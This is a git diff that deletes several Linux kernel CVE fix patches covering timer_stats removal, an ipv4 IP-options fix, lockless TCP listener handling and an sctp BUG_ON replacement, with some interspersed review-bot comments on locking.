timer_stats_update_stats(void *timer, pid_t pid, void *startf, -- void *timerf, char *comm, u32 flags); -- --extern void __timer_stats_timer_set_start_info(struct timer_list *timer, -- void *addr); -- --static inline void timer_stats_timer_set_start_info(struct timer_list *timer) --{ -- if (likely(!timer_stats_active)) -- return; -- __timer_stats_timer_set_start_info(timer, __builtin_return_address(0)); --} -- --static inline void timer_stats_timer_clear_start_info(struct timer_list *timer) --{ -- timer->start_site = NULL; --} --#else --static inline void init_timer_stats(void) --{ --} -- --static inline void timer_stats_timer_set_start_info(struct timer_list *timer) --{ --} -- --static inline void timer_stats_timer_clear_start_info(struct timer_list *timer) --{ --} --#endif -- - extern void add_timer(struct timer_list *timer); - - extern int try_to_del_timer_sync(struct timer_list *timer); -diff --git a/kernel/kthread.c b/kernel/kthread.c -index 2318fba..8461a43 100644 ---- a/kernel/kthread.c -+++ b/kernel/kthread.c -@@ -850,7 +850,6 @@ void __kthread_queue_delayed_work(struct kthread_worker *worker, - - list_add(&work->node, &worker->delayed_work_list); - work->worker = worker; -- timer_stats_timer_set_start_info(&dwork->timer); - timer->expires = jiffies + delay; - add_timer(timer); - } -diff --git a/kernel/time/Makefile b/kernel/time/Makefile -index 976840d..938dbf3 100644 ---- a/kernel/time/Makefile -+++ b/kernel/time/Makefile -@@ -15,6 +15,5 @@ ifeq ($(CONFIG_GENERIC_CLOCKEVENTS_BROADCAST),y) - endif - obj-$(CONFIG_GENERIC_SCHED_CLOCK) += sched_clock.o - obj-$(CONFIG_TICK_ONESHOT) += tick-oneshot.o tick-sched.o --obj-$(CONFIG_TIMER_STATS) += timer_stats.o - obj-$(CONFIG_DEBUG_FS) += timekeeping_debug.o - obj-$(CONFIG_TEST_UDELAY) += test_udelay.o -diff --git a/kernel/time/hrtimer.c b/kernel/time/hrtimer.c -index c6ecedd..edabde6 100644 ---- a/kernel/time/hrtimer.c -+++ b/kernel/time/hrtimer.c -@@ -766,34 +766,6 @@ void hrtimers_resume(void) - 
clock_was_set_delayed(); - } - --static inline void timer_stats_hrtimer_set_start_info(struct hrtimer *timer) --{ --#ifdef CONFIG_TIMER_STATS -- if (timer->start_site) -- return; -- timer->start_site = __builtin_return_address(0); -- memcpy(timer->start_comm, current->comm, TASK_COMM_LEN); -- timer->start_pid = current->pid; --#endif --} -- --static inline void timer_stats_hrtimer_clear_start_info(struct hrtimer *timer) --{ --#ifdef CONFIG_TIMER_STATS -- timer->start_site = NULL; --#endif --} -- --static inline void timer_stats_account_hrtimer(struct hrtimer *timer) --{ --#ifdef CONFIG_TIMER_STATS -- if (likely(!timer_stats_active)) -- return; -- timer_stats_update_stats(timer, timer->start_pid, timer->start_site, -- timer->function, timer->start_comm, 0); --#endif --} -- - /* - * Counterpart to lock_hrtimer_base above: - */ -@@ -932,7 +904,6 @@ remove_hrtimer(struct hrtimer *timer, struct hrtimer_clock_base *base, bool rest - * rare case and less expensive than a smp call. - */ - debug_deactivate(timer); -- timer_stats_hrtimer_clear_start_info(timer); - reprogram = base->cpu_base == this_cpu_ptr(&hrtimer_bases); - - if (!restart) -@@ -990,8 +961,6 @@ void hrtimer_start_range_ns(struct hrtimer *timer, ktime_t tim, - /* Switch the timer base, if necessary: */ - new_base = switch_hrtimer_base(timer, base, mode & HRTIMER_MODE_PINNED); - -- timer_stats_hrtimer_set_start_info(timer); -- - leftmost = enqueue_hrtimer(timer, new_base); - if (!leftmost) - goto unlock; -@@ -1128,12 +1097,6 @@ static void __hrtimer_init(struct hrtimer *timer, clockid_t clock_id, - base = hrtimer_clockid_to_base(clock_id); - timer->base = &cpu_base->clock_base[base]; - timerqueue_init(&timer->node); -- --#ifdef CONFIG_TIMER_STATS -- timer->start_site = NULL; -- timer->start_pid = -1; -- memset(timer->start_comm, 0, TASK_COMM_LEN); --#endif - } - - /** -@@ -1217,7 +1180,6 @@ static void __run_hrtimer(struct hrtimer_cpu_base *cpu_base, - raw_write_seqcount_barrier(&cpu_base->seq); - - 
__remove_hrtimer(timer, base, HRTIMER_STATE_INACTIVE, 0); -- timer_stats_account_hrtimer(timer); - fn = timer->function; - - /* -diff --git a/kernel/time/timer.c b/kernel/time/timer.c -index ec33a69..82a6bfa 100644 ---- a/kernel/time/timer.c -+++ b/kernel/time/timer.c -@@ -571,38 +571,6 @@ internal_add_timer(struct timer_base *base, struct timer_list *timer) - trigger_dyntick_cpu(base, timer); - } - --#ifdef CONFIG_TIMER_STATS --void __timer_stats_timer_set_start_info(struct timer_list *timer, void *addr) --{ -- if (timer->start_site) -- return; -- -- timer->start_site = addr; -- memcpy(timer->start_comm, current->comm, TASK_COMM_LEN); -- timer->start_pid = current->pid; --} -- --static void timer_stats_account_timer(struct timer_list *timer) --{ -- void *site; -- -- /* -- * start_site can be concurrently reset by -- * timer_stats_timer_clear_start_info() -- */ -- site = READ_ONCE(timer->start_site); -- if (likely(!site)) -- return; -- -- timer_stats_update_stats(timer, timer->start_pid, site, -- timer->function, timer->start_comm, -- timer->flags); --} -- --#else --static void timer_stats_account_timer(struct timer_list *timer) {} --#endif -- - #ifdef CONFIG_DEBUG_OBJECTS_TIMERS - - static struct debug_obj_descr timer_debug_descr; -@@ -789,11 +757,6 @@ static void do_init_timer(struct timer_list *timer, unsigned int flags, - { - timer->entry.pprev = NULL; - timer->flags = flags | raw_smp_processor_id(); --#ifdef CONFIG_TIMER_STATS -- timer->start_site = NULL; -- timer->start_pid = -1; -- memset(timer->start_comm, 0, TASK_COMM_LEN); --#endif - lockdep_init_map(&timer->lockdep_map, name, key, 0); - } - -@@ -1001,8 +964,6 @@ __mod_timer(struct timer_list *timer, unsigned long expires, bool pending_only) - base = lock_timer_base(timer, &flags); - } - -- timer_stats_timer_set_start_info(timer); -- - ret = detach_if_pending(timer, base, false); - if (!ret && pending_only) - goto out_unlock; -@@ -1130,7 +1091,6 @@ void add_timer_on(struct timer_list *timer, int cpu) - 
struct timer_base *new_base, *base; - unsigned long flags; - -- timer_stats_timer_set_start_info(timer); - BUG_ON(timer_pending(timer) || !timer->function); - - new_base = get_timer_cpu_base(timer->flags, cpu); -@@ -1176,7 +1136,6 @@ int del_timer(struct timer_list *timer) - - debug_assert_init(timer); - -- timer_stats_timer_clear_start_info(timer); - if (timer_pending(timer)) { - base = lock_timer_base(timer, &flags); - ret = detach_if_pending(timer, base, true); -@@ -1204,10 +1163,9 @@ int try_to_del_timer_sync(struct timer_list *timer) - - base = lock_timer_base(timer, &flags); - -- if (base->running_timer != timer) { -- timer_stats_timer_clear_start_info(timer); -+ if (base->running_timer != timer) - ret = detach_if_pending(timer, base, true); -- } -+ - spin_unlock_irqrestore(&base->lock, flags); - - return ret; -@@ -1331,7 +1289,6 @@ static void expire_timers(struct timer_base *base, struct hlist_head *head) - unsigned long data; - - timer = hlist_entry(head->first, struct timer_list, entry); -- timer_stats_account_timer(timer); - - base->running_timer = timer; - detach_timer(timer, true); -@@ -1868,7 +1825,6 @@ static void __init init_timer_cpus(void) - void __init init_timers(void) - { - init_timer_cpus(); -- init_timer_stats(); - open_softirq(TIMER_SOFTIRQ, run_timer_softirq); - } - -diff --git a/kernel/time/timer_list.c b/kernel/time/timer_list.c -index afe6cd1..387a3a5 100644 ---- a/kernel/time/timer_list.c -+++ b/kernel/time/timer_list.c -@@ -62,21 +62,11 @@ static void - print_timer(struct seq_file *m, struct hrtimer *taddr, struct hrtimer *timer, - int idx, u64 now) - { --#ifdef CONFIG_TIMER_STATS -- char tmp[TASK_COMM_LEN + 1]; --#endif - SEQ_printf(m, " #%d: ", idx); - print_name_offset(m, taddr); - SEQ_printf(m, ", "); - print_name_offset(m, timer->function); - SEQ_printf(m, ", S:%02x", timer->state); --#ifdef CONFIG_TIMER_STATS -- SEQ_printf(m, ", "); -- print_name_offset(m, timer->start_site); -- memcpy(tmp, timer->start_comm, TASK_COMM_LEN); -- 
tmp[TASK_COMM_LEN] = 0; -- SEQ_printf(m, ", %s/%d", tmp, timer->start_pid); --#endif - SEQ_printf(m, "\n"); - SEQ_printf(m, " # expires at %Lu-%Lu nsecs [in %Ld to %Ld nsecs]\n", - (unsigned long long)ktime_to_ns(hrtimer_get_softexpires(timer)), -diff --git a/kernel/time/timer_stats.c b/kernel/time/timer_stats.c -deleted file mode 100644 -index afddded..0000000 ---- a/kernel/time/timer_stats.c -+++ /dev/null -@@ -1,425 +0,0 @@ --/* -- * kernel/time/timer_stats.c -- * -- * Collect timer usage statistics. -- * -- * Copyright(C) 2006, Red Hat, Inc., Ingo Molnar -- * Copyright(C) 2006 Timesys Corp., Thomas Gleixner -- * -- * timer_stats is based on timer_top, a similar functionality which was part of -- * Con Kolivas dyntick patch set. It was developed by Daniel Petrini at the -- * Instituto Nokia de Tecnologia - INdT - Manaus. timer_top's design was based -- * on dynamic allocation of the statistics entries and linear search based -- * lookup combined with a global lock, rather than the static array, hash -- * and per-CPU locking which is used by timer_stats. It was written for the -- * pre hrtimer kernel code and therefore did not take hrtimers into account. -- * Nevertheless it provided the base for the timer_stats implementation and -- * was a helpful source of inspiration. Kudos to Daniel and the Nokia folks -- * for this effort. -- * -- * timer_top.c is -- * Copyright (C) 2005 Instituto Nokia de Tecnologia - INdT - Manaus -- * Written by Daniel Petrini -- * timer_top.c was released under the GNU General Public License version 2 -- * -- * We export the addresses and counting of timer functions being called, -- * the pid and cmdline from the owner process if applicable. 
-- * -- * Start/stop data collection: -- * # echo [1|0] >/proc/timer_stats -- * -- * Display the information collected so far: -- * # cat /proc/timer_stats -- * -- * This program is free software; you can redistribute it and/or modify -- * it under the terms of the GNU General Public License version 2 as -- * published by the Free Software Foundation. -- */ -- --#include --#include --#include --#include --#include --#include -- --#include -- --/* -- * This is our basic unit of interest: a timer expiry event identified -- * by the timer, its start/expire functions and the PID of the task that -- * started the timer. We count the number of times an event happens: -- */ --struct entry { -- /* -- * Hash list: -- */ -- struct entry *next; -- -- /* -- * Hash keys: -- */ -- void *timer; -- void *start_func; -- void *expire_func; -- pid_t pid; -- -- /* -- * Number of timeout events: -- */ -- unsigned long count; -- u32 flags; -- -- /* -- * We save the command-line string to preserve -- * this information past task exit: -- */ -- char comm[TASK_COMM_LEN + 1]; -- --} ____cacheline_aligned_in_smp; -- --/* -- * Spinlock protecting the tables - not taken during lookup: -- */ --static DEFINE_RAW_SPINLOCK(table_lock); -- --/* -- * Per-CPU lookup locks for fast hash lookup: -- */ --static DEFINE_PER_CPU(raw_spinlock_t, tstats_lookup_lock); -- --/* -- * Mutex to serialize state changes with show-stats activities: -- */ --static DEFINE_MUTEX(show_mutex); -- --/* -- * Collection status, active/inactive: -- */ --int __read_mostly timer_stats_active; -- --/* -- * Beginning/end timestamps of measurement: -- */ --static ktime_t time_start, time_stop; -- --/* -- * tstat entry structs only get allocated while collection is -- * active and never freed during that time - this simplifies -- * things quite a bit. -- * -- * They get freed when a new collection period is started. 
-- */ --#define MAX_ENTRIES_BITS 10 --#define MAX_ENTRIES (1UL << MAX_ENTRIES_BITS) -- --static unsigned long nr_entries; --static struct entry entries[MAX_ENTRIES]; -- --static atomic_t overflow_count; -- --/* -- * The entries are in a hash-table, for fast lookup: -- */ --#define TSTAT_HASH_BITS (MAX_ENTRIES_BITS - 1) --#define TSTAT_HASH_SIZE (1UL << TSTAT_HASH_BITS) --#define TSTAT_HASH_MASK (TSTAT_HASH_SIZE - 1) -- --#define __tstat_hashfn(entry) \ -- (((unsigned long)(entry)->timer ^ \ -- (unsigned long)(entry)->start_func ^ \ -- (unsigned long)(entry)->expire_func ^ \ -- (unsigned long)(entry)->pid ) & TSTAT_HASH_MASK) -- --#define tstat_hashentry(entry) (tstat_hash_table + __tstat_hashfn(entry)) -- --static struct entry *tstat_hash_table[TSTAT_HASH_SIZE] __read_mostly; -- --static void reset_entries(void) --{ -- nr_entries = 0; -- memset(entries, 0, sizeof(entries)); -- memset(tstat_hash_table, 0, sizeof(tstat_hash_table)); -- atomic_set(&overflow_count, 0); --} -- --static struct entry *alloc_entry(void) --{ -- if (nr_entries >= MAX_ENTRIES) -- return NULL; -- -- return entries + nr_entries++; --} -- --static int match_entries(struct entry *entry1, struct entry *entry2) --{ -- return entry1->timer == entry2->timer && -- entry1->start_func == entry2->start_func && -- entry1->expire_func == entry2->expire_func && -- entry1->pid == entry2->pid; --} -- --/* -- * Look up whether an entry matching this item is present -- * in the hash already. 
Must be called with irqs off and the -- * lookup lock held: -- */ --static struct entry *tstat_lookup(struct entry *entry, char *comm) --{ -- struct entry **head, *curr, *prev; -- -- head = tstat_hashentry(entry); -- curr = *head; -- -- /* -- * The fastpath is when the entry is already hashed, -- * we do this with the lookup lock held, but with the -- * table lock not held: -- */ -- while (curr) { -- if (match_entries(curr, entry)) -- return curr; -- -- curr = curr->next; -- } -- /* -- * Slowpath: allocate, set up and link a new hash entry: -- */ -- prev = NULL; -- curr = *head; -- -- raw_spin_lock(&table_lock); -- /* -- * Make sure we have not raced with another CPU: -- */ -- while (curr) { -- if (match_entries(curr, entry)) -- goto out_unlock; -- -- prev = curr; -- curr = curr->next; -- } -- -- curr = alloc_entry(); -- if (curr) { -- *curr = *entry; -- curr->count = 0; -- curr->next = NULL; -- memcpy(curr->comm, comm, TASK_COMM_LEN); -- -- smp_mb(); /* Ensure that curr is initialized before insert */ -- -- if (prev) -- prev->next = curr; -- else -- *head = curr; -- } -- out_unlock: -- raw_spin_unlock(&table_lock); -- -- return curr; --} -- --/** -- * timer_stats_update_stats - Update the statistics for a timer. -- * @timer: pointer to either a timer_list or a hrtimer -- * @pid: the pid of the task which set up the timer -- * @startf: pointer to the function which did the timer setup -- * @timerf: pointer to the timer callback function of the timer -- * @comm: name of the process which set up the timer -- * @tflags: The flags field of the timer -- * -- * When the timer is already registered, then the event counter is -- * incremented. Otherwise the timer is registered in a free slot. 
-- */ --void timer_stats_update_stats(void *timer, pid_t pid, void *startf, -- void *timerf, char *comm, u32 tflags) --{ -- /* -- * It doesn't matter which lock we take: -- */ -- raw_spinlock_t *lock; -- struct entry *entry, input; -- unsigned long flags; -- -- if (likely(!timer_stats_active)) -- return; -- -- lock = &per_cpu(tstats_lookup_lock, raw_smp_processor_id()); -- -- input.timer = timer; -- input.start_func = startf; -- input.expire_func = timerf; -- input.pid = pid; -- input.flags = tflags; -- -- raw_spin_lock_irqsave(lock, flags); -- if (!timer_stats_active) -- goto out_unlock; -- -- entry = tstat_lookup(&input, comm); -- if (likely(entry)) -- entry->count++; -- else -- atomic_inc(&overflow_count); -- -- out_unlock: -- raw_spin_unlock_irqrestore(lock, flags); --} -- --static void print_name_offset(struct seq_file *m, unsigned long addr) --{ -- char symname[KSYM_NAME_LEN]; -- -- if (lookup_symbol_name(addr, symname) < 0) -- seq_printf(m, "<%p>", (void *)addr); -- else -- seq_printf(m, "%s", symname); --} -- --static int tstats_show(struct seq_file *m, void *v) --{ -- struct timespec64 period; -- struct entry *entry; -- unsigned long ms; -- long events = 0; -- ktime_t time; -- int i; -- -- mutex_lock(&show_mutex); -- /* -- * If still active then calculate up to now: -- */ -- if (timer_stats_active) -- time_stop = ktime_get(); -- -- time = ktime_sub(time_stop, time_start); -- -- period = ktime_to_timespec64(time); -- ms = period.tv_nsec / 1000000; -- -- seq_puts(m, "Timer Stats Version: v0.3\n"); -- seq_printf(m, "Sample period: %ld.%03ld s\n", (long)period.tv_sec, ms); -- if (atomic_read(&overflow_count)) -- seq_printf(m, "Overflow: %d entries\n", atomic_read(&overflow_count)); -- seq_printf(m, "Collection: %s\n", timer_stats_active ? 
"active" : "inactive"); -- -- for (i = 0; i < nr_entries; i++) { -- entry = entries + i; -- if (entry->flags & TIMER_DEFERRABLE) { -- seq_printf(m, "%4luD, %5d %-16s ", -- entry->count, entry->pid, entry->comm); -- } else { -- seq_printf(m, " %4lu, %5d %-16s ", -- entry->count, entry->pid, entry->comm); -- } -- -- print_name_offset(m, (unsigned long)entry->start_func); -- seq_puts(m, " ("); -- print_name_offset(m, (unsigned long)entry->expire_func); -- seq_puts(m, ")\n"); -- -- events += entry->count; -- } -- -- ms += period.tv_sec * 1000; -- if (!ms) -- ms = 1; -- -- if (events && period.tv_sec) -- seq_printf(m, "%ld total events, %ld.%03ld events/sec\n", -- events, events * 1000 / ms, -- (events * 1000000 / ms) % 1000); -- else -- seq_printf(m, "%ld total events\n", events); -- -- mutex_unlock(&show_mutex); -- -- return 0; --} -- --/* -- * After a state change, make sure all concurrent lookup/update -- * activities have stopped: -- */ --static void sync_access(void) --{ -- unsigned long flags; -- int cpu; -- -- for_each_online_cpu(cpu) { -- raw_spinlock_t *lock = &per_cpu(tstats_lookup_lock, cpu); -- -- raw_spin_lock_irqsave(lock, flags); -- /* nothing */ -- raw_spin_unlock_irqrestore(lock, flags); -- } --} -- --static ssize_t tstats_write(struct file *file, const char __user *buf, -- size_t count, loff_t *offs) --{ -- char ctl[2]; -- -- if (count != 2 || *offs) -- return -EINVAL; -- -- if (copy_from_user(ctl, buf, count)) -- return -EFAULT; -- -- mutex_lock(&show_mutex); -- switch (ctl[0]) { -- case '0': -- if (timer_stats_active) { -- timer_stats_active = 0; -- time_stop = ktime_get(); -- sync_access(); -- } -- break; -- case '1': -- if (!timer_stats_active) { -- reset_entries(); -- time_start = ktime_get(); -- smp_mb(); -- timer_stats_active = 1; -- } -- break; -- default: -- count = -EINVAL; -- } -- mutex_unlock(&show_mutex); -- -- return count; --} -- --static int tstats_open(struct inode *inode, struct file *filp) --{ -- return single_open(filp, 
tstats_show, NULL); --} -- --static const struct file_operations tstats_fops = { -- .open = tstats_open, -- .read = seq_read, -- .write = tstats_write, -- .llseek = seq_lseek, -- .release = single_release, --}; -- --void __init init_timer_stats(void) --{ -- int cpu; -- -- for_each_possible_cpu(cpu) -- raw_spin_lock_init(&per_cpu(tstats_lookup_lock, cpu)); --} -- --static int __init init_tstats_procfs(void) --{ -- struct proc_dir_entry *pe; -- -- pe = proc_create("timer_stats", 0644, NULL, &tstats_fops); -- if (!pe) -- return -ENOMEM; -- return 0; --} --__initcall(init_tstats_procfs); -diff --git a/kernel/workqueue.c b/kernel/workqueue.c -index 1d9fb65..072cbc9 100644 ---- a/kernel/workqueue.c -+++ b/kernel/workqueue.c -@@ -1523,8 +1523,6 @@ static void __queue_delayed_work(int cpu, struct workqueue_struct *wq, - return; - } - -- timer_stats_timer_set_start_info(&dwork->timer); -- - dwork->wq = wq; - dwork->cpu = cpu; - timer->expires = jiffies + delay; -diff --git a/lib/Kconfig.debug b/lib/Kconfig.debug -index eb9e9a7..132af33 100644 ---- a/lib/Kconfig.debug -+++ b/lib/Kconfig.debug -@@ -980,20 +980,6 @@ config DEBUG_TIMEKEEPING - - If unsure, say N. - --config TIMER_STATS -- bool "Collect kernel timers statistics" -- depends on DEBUG_KERNEL && PROC_FS -- help -- If you say Y here, additional code will be inserted into the -- timer routines to collect statistics about kernel timers being -- reprogrammed. The statistics can be read from /proc/timer_stats. -- The statistics collection is started by writing 1 to /proc/timer_stats, -- writing 0 stops it. This feature is useful to collect information -- about timer usage patterns in kernel and userspace. This feature -- is lightweight if enabled in the kernel config but not activated -- (it defaults to deactivated on bootup and will only be activated -- if some application like powertop activates it explicitly). 
-- - config DEBUG_PREEMPT - bool "Debug preemptible kernel" - depends on DEBUG_KERNEL && PREEMPT && TRACE_IRQFLAGS_SUPPORT --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-5970/^4.9/0001.patch b/Patches/Linux_CVEs/CVE-2017-5970/^4.9/0001.patch deleted file mode 100644 index 4ba73cae..00000000 --- a/Patches/Linux_CVEs/CVE-2017-5970/^4.9/0001.patch +++ /dev/null @@ -1,47 +0,0 @@ -From 34b2cef20f19c87999fff3da4071e66937db9644 Mon Sep 17 00:00:00 2001 -From: Eric Dumazet -Date: Sat, 4 Feb 2017 11:16:52 -0800 -Subject: ipv4: keep skb->dst around in presence of IP options - -Andrey Konovalov got crashes in __ip_options_echo() when a NULL skb->dst -is accessed. - -ipv4_pktinfo_prepare() should not drop the dst if (evil) IP options -are present. - -We could refine the test to the presence of ts_needtime or srr, -but IP options are not often used, so let's be conservative. - -Thanks to syzkaller team for finding this bug. - -Fixes: d826eb14ecef ("ipv4: PKTINFO doesnt need dst reference") -Signed-off-by: Eric Dumazet -Reported-by: Andrey Konovalov -Signed-off-by: David S. Miller ---- - net/ipv4/ip_sockglue.c | 9 ++++++++- - 1 file changed, 8 insertions(+), 1 deletion(-) - -diff --git a/net/ipv4/ip_sockglue.c b/net/ipv4/ip_sockglue.c -index 53ae0c6..9000117 100644 ---- a/net/ipv4/ip_sockglue.c -+++ b/net/ipv4/ip_sockglue.c -@@ -1238,7 +1238,14 @@ void ipv4_pktinfo_prepare(const struct sock *sk, struct sk_buff *skb) - pktinfo->ipi_ifindex = 0; - pktinfo->ipi_spec_dst.s_addr = 0; - } -- skb_dst_drop(skb); -+ /* We need to keep the dst for __ip_options_echo() -+ * We could restrict the test to opt.ts_needtime || opt.srr, -+ * but the following is good enough as IP options are not often used. -+ */ -+ if (unlikely(IPCB(skb)->opt.optlen)) -+ skb_dst_force(skb); -+ else -+ skb_dst_drop(skb); - } - - int ip_setsockopt(struct sock *sk, int level, --- -cgit v1.1 - 
diff --git a/Patches/Linux_CVEs/CVE-2017-5972/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-5972/ANY/0001.patch
deleted file mode 100644
index fc2e7e02..00000000
--- a/Patches/Linux_CVEs/CVE-2017-5972/ANY/0001.patch
+++ /dev/null
@@ -1,112 +0,0 @@ -From e994b2f0fb9229aeff5eea9541320bd7b2ca8714 Mon Sep 17 00:00:00 2001 -From: Eric Dumazet -Date: Fri, 2 Oct 2015 11:43:39 -0700 -Subject: [PATCH] tcp: do not lock listener to process SYN packets - -Everything should now be ready to finally allow SYN -packets processing without holding listener lock. - -Tested: - -3.5 Mpps SYNFLOOD. Plenty of cpu cycles available. - -Next bottleneck is the refcount taken on listener, -that could be avoided if we remove SLAB_DESTROY_BY_RCU -strict semantic for listeners, and use regular RCU. - - 13.18% [kernel] [k] __inet_lookup_listener - 9.61% [kernel] [k] tcp_conn_request - 8.16% [kernel] [k] sha_transform - 5.30% [kernel] [k] inet_reqsk_alloc - 4.22% [kernel] [k] sock_put - 3.74% [kernel] [k] tcp_make_synack - 2.88% [kernel] [k] ipt_do_table - 2.56% [kernel] [k] memcpy_erms - 2.53% [kernel] [k] sock_wfree - 2.40% [kernel] [k] tcp_v4_rcv - 2.08% [kernel] [k] fib_table_lookup - 1.84% [kernel] [k] tcp_openreq_init_rwin - -Signed-off-by: Eric Dumazet -Signed-off-by: David S. Miller ---- - net/ipv4/tcp_ipv4.c | 11 +++++++++-- - net/ipv6/tcp_ipv6.c | 11 +++++++++-- - 2 files changed, 18 insertions(+), 4 deletions(-) - -diff --git a/net/ipv4/tcp_ipv4.c b/net/ipv4/tcp_ipv4.c -index ac2ea73e9aafc..34310748a3655 100644 ---- a/net/ipv4/tcp_ipv4.c -+++ b/net/ipv4/tcp_ipv4.c -@@ -1355,7 +1355,7 @@ static struct sock *tcp_v4_cookie_check(struct sock *sk, struct sk_buff *skb) - } - - /* The socket must have it's spinlock held when we get -- * here. -+ * here, unless it is a TCP_LISTEN socket. - * - * We have a potential double-lock case here, so even when - * doing backlog processing we use the BH locking scheme. 
-@@ -1619,9 +1619,15 @@ int tcp_v4_rcv(struct sk_buff *skb) - if (sk_filter(sk, skb)) - goto discard_and_relse; - -- sk_incoming_cpu_update(sk); - skb->dev = NULL; - -+ if (sk->sk_state == TCP_LISTEN) { -+ ret = tcp_v4_do_rcv(sk, skb); -+ goto put_and_return; -+ } -+ -+ sk_incoming_cpu_update(sk); -+ - bh_lock_sock_nested(sk); - tcp_sk(sk)->segs_in += max_t(u16, 1, skb_shinfo(skb)->gso_segs); - ret = 0; -@@ -1636,6 +1642,7 @@ int tcp_v4_rcv(struct sk_buff *skb) - } - bh_unlock_sock(sk); - -+put_and_return: - sock_put(sk); - - return ret; -diff --git a/net/ipv6/tcp_ipv6.c b/net/ipv6/tcp_ipv6.c -index 3d18571811c5e..33334f0c217de 100644 ---- a/net/ipv6/tcp_ipv6.c -+++ b/net/ipv6/tcp_ipv6.c -@@ -1161,7 +1161,7 @@ static struct sock *tcp_v6_syn_recv_sock(const struct sock *sk, struct sk_buff * - } - - /* The socket must have it's spinlock held when we get -- * here. -+ * here, unless it is a TCP_LISTEN socket. - * - * We have a potential double-lock case here, so even when - * doing backlog processing we use the BH locking scheme. -@@ -1415,9 +1415,15 @@ static int tcp_v6_rcv(struct sk_buff *skb) - if (sk_filter(sk, skb)) - goto discard_and_relse; - -- sk_incoming_cpu_update(sk); - skb->dev = NULL; - -+ if (sk->sk_state == TCP_LISTEN) { -+ ret = tcp_v6_do_rcv(sk, skb); -+ goto put_and_return; -+ } -+ -+ sk_incoming_cpu_update(sk); -+ - bh_lock_sock_nested(sk); - tcp_sk(sk)->segs_in += max_t(u16, 1, skb_shinfo(skb)->gso_segs); - ret = 0; -@@ -1432,6 +1438,7 @@ static int tcp_v6_rcv(struct sk_buff *skb) - } - bh_unlock_sock(sk); - -+put_and_return: - sock_put(sk); - return ret ? -1 : 0; - diff --git a/Patches/Linux_CVEs/CVE-2017-5972/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2017-5972/ANY/0002.patch deleted file mode 100644 index 7a08c666..00000000 --- a/Patches/Linux_CVEs/CVE-2017-5972/ANY/0002.patch +++ /dev/null 
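Review bot: The new `if (sk->sk_state == TCP_LISTEN)` branch in tcp_v4_rcv (and the matching one in tcp_v6_rcv) reads the state without the socket lock and has no comment saying the value is only a snapshot. The companion patch 0002 removes a BUG_ON because "its sk_state can change anytime", so the code reached through `tcp_v4_do_rcv()` has to cope with a socket that has already left TCP_LISTEN. A comment on the branch would record that, for example `/* lockless: sk_state may change after this test; the listen path must not assume TCP_LISTEN */`. The branch also skips `sk_incoming_cpu_update(sk)` for listeners, which should be stated as intended. Both functions continue outside the hunks.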
@@ -1,25 +0,0 @@ -From b7b89be8d4ab0c5e6eb0cdfb1108af08a1cd088f Mon Sep 17 00:00:00 2001 -From: Eric Dumazet -Date: Fri, 02 Oct 2015 11:43:29 -0700 -Subject: [PATCH] tcp: remove BUG_ON() in tcp_check_req() - -Once listener is lockless, its sk_state can change anytime. - -Change-Id: I3a8c4aa4974294b865d79ea997df4c8cee5ffbc2 -Signed-off-by: Eric Dumazet -Signed-off-by: David S. Miller ---- - -diff --git a/net/ipv4/tcp_minisocks.c b/net/ipv4/tcp_minisocks.c -index 0f01788..28f72aa 100644 ---- a/net/ipv4/tcp_minisocks.c -+++ b/net/ipv4/tcp_minisocks.c -@@ -511,8 +511,6 @@ - __be32 flg = tcp_flag_word(th) & (TCP_FLAG_RST|TCP_FLAG_SYN|TCP_FLAG_ACK); - bool paws_reject = false; - -- BUG_ON(fastopen == (sk->sk_state == TCP_LISTEN)); -- - tmp_opt.saw_tstamp = 0; - if (th->doff > (sizeof(struct tcphdr)>>2)) { - tcp_parse_options(skb, &tmp_opt, 0, NULL); diff --git a/Patches/Linux_CVEs/CVE-2017-5972/ANY/0002.patch.base64 b/Patches/Linux_CVEs/CVE-2017-5972/ANY/0002.patch.base64 deleted file mode 100644 index 4fa5d03d..00000000 --- a/Patches/Linux_CVEs/CVE-2017-5972/ANY/0002.patch.base64 +++ /dev/null @@ -1 +0,0 @@ -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 \ No newline at end of file diff --git a/Patches/Linux_CVEs/CVE-2017-5986/^4.9/0001.patch b/Patches/Linux_CVEs/CVE-2017-5986/^4.9/0001.patch deleted file mode 100644 index 8dfe30ea..00000000 --- a/Patches/Linux_CVEs/CVE-2017-5986/^4.9/0001.patch +++ /dev/null 
@@ -1,39 +0,0 @@ -From 2dcab598484185dea7ec22219c76dcdd59e3cb90 Mon Sep 17 00:00:00 2001 -From: Marcelo Ricardo Leitner -Date: Mon, 6 Feb 2017 18:10:31 -0200 -Subject: sctp: avoid BUG_ON on sctp_wait_for_sndbuf - -Alexander Popov reported that an application may trigger a BUG_ON in -sctp_wait_for_sndbuf if the socket tx buffer is full, a thread is -waiting on it to queue more data and meanwhile another thread peels off -the association being used by the first thread. - -This patch replaces the BUG_ON call with a proper error handling. It -will return -EPIPE to the original sendmsg call, similarly to what would -have been done if the association wasn't found in the first place. - -Acked-by: Alexander Popov -Signed-off-by: Marcelo Ricardo Leitner -Reviewed-by: Xin Long -Signed-off-by: David S. Miller ---- - net/sctp/socket.c | 3 ++- - 1 file changed, 2 insertions(+), 1 deletion(-) - -diff --git a/net/sctp/socket.c b/net/sctp/socket.c -index 37eeab7..e214d2e 100644 ---- a/net/sctp/socket.c -+++ b/net/sctp/socket.c -@@ -7426,7 +7426,8 @@ static int sctp_wait_for_sndbuf(struct sctp_association *asoc, long *timeo_p, - */ - release_sock(sk); - current_timeo = schedule_timeout(current_timeo); -- BUG_ON(sk != asoc->base.sk); -+ if (sk != asoc->base.sk) -+ goto do_error; - lock_sock(sk); - - *timeo_p = current_timeo; --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-6001/3.2-3.4/0001.patch b/Patches/Linux_CVEs/CVE-2017-6001/3.2-3.4/0001.patch deleted file mode 100644 index a9442471..00000000 --- a/Patches/Linux_CVEs/CVE-2017-6001/3.2-3.4/0001.patch +++ /dev/null 
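Review bot: In the sctp_wait_for_sndbuf hunk, the new `if (sk != asoc->base.sk) goto do_error;` runs after `release_sock(sk)` and before `lock_sock(sk)`, so this path leaves the function with the socket unlocked, while the fall-through path re-takes the lock. The do_error label and the sendmsg caller are outside the hunk, so the consequence is inferred: a caller that releases the socket after any error return would unlock a socket it no longer holds. Placing the test after the re-lock keeps the lock state the same on every exit: `lock_sock(sk);` followed by `if (sk != asoc->base.sk) goto do_error;`.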
